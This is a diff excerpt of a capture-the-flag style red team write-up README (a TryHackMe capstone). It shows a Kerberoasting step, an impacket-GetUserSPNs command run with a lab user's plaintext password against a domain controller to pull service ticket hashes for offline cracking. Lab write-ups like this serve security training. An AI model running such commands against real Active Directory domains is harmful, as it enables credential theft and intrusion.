zinzloun/THM_WriteUP/RTM_Capstone/README.md

 That implies I can reach my python web server from other hosts visitng the following URL http://10.200.89.21:1180

  ### Kerberosting
- Now that I can reach the DC directly from the attacker machine, we can use Impacket to search for kerberostable service accounts.
+ Now that I can reach the DC directly from the attacker machine, I can use Impacket to search for kerberostable service accounts.
 Again I used laura.wood credentials to query Active Directory:

  	impacket-GetUserSPNs -outputfile kerberoastables.txt -dc-ip 10.200.89.102  'corp.thereserve.loc/laura.wood:Password1@'
   	Impacket v0.12.0.dev1 - Copyright 2023 Fortra